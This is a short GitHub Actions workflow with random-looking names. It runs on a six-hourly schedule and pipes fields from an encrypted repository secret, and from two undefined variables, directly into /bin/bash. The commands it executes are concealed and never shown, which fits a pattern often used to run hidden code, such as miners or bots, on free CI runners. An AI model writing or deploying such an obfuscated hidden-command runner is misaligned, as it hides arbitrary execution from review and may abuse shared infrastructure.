name: yezhongshu2603

on:
  workflow_dispatch:
  schedule:
    - cron: '50 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yezhongshu2603
        env:
          m8: ${{ secrets.m8 }}
        run: |
          echo $m8 | jq -r .kds28396 | /bin/bash
          echo $bash53054 | jq -r .kj3 | /bin/bash
          echo $ttqgg77012 | jq -r .l2965 | /bin/bash

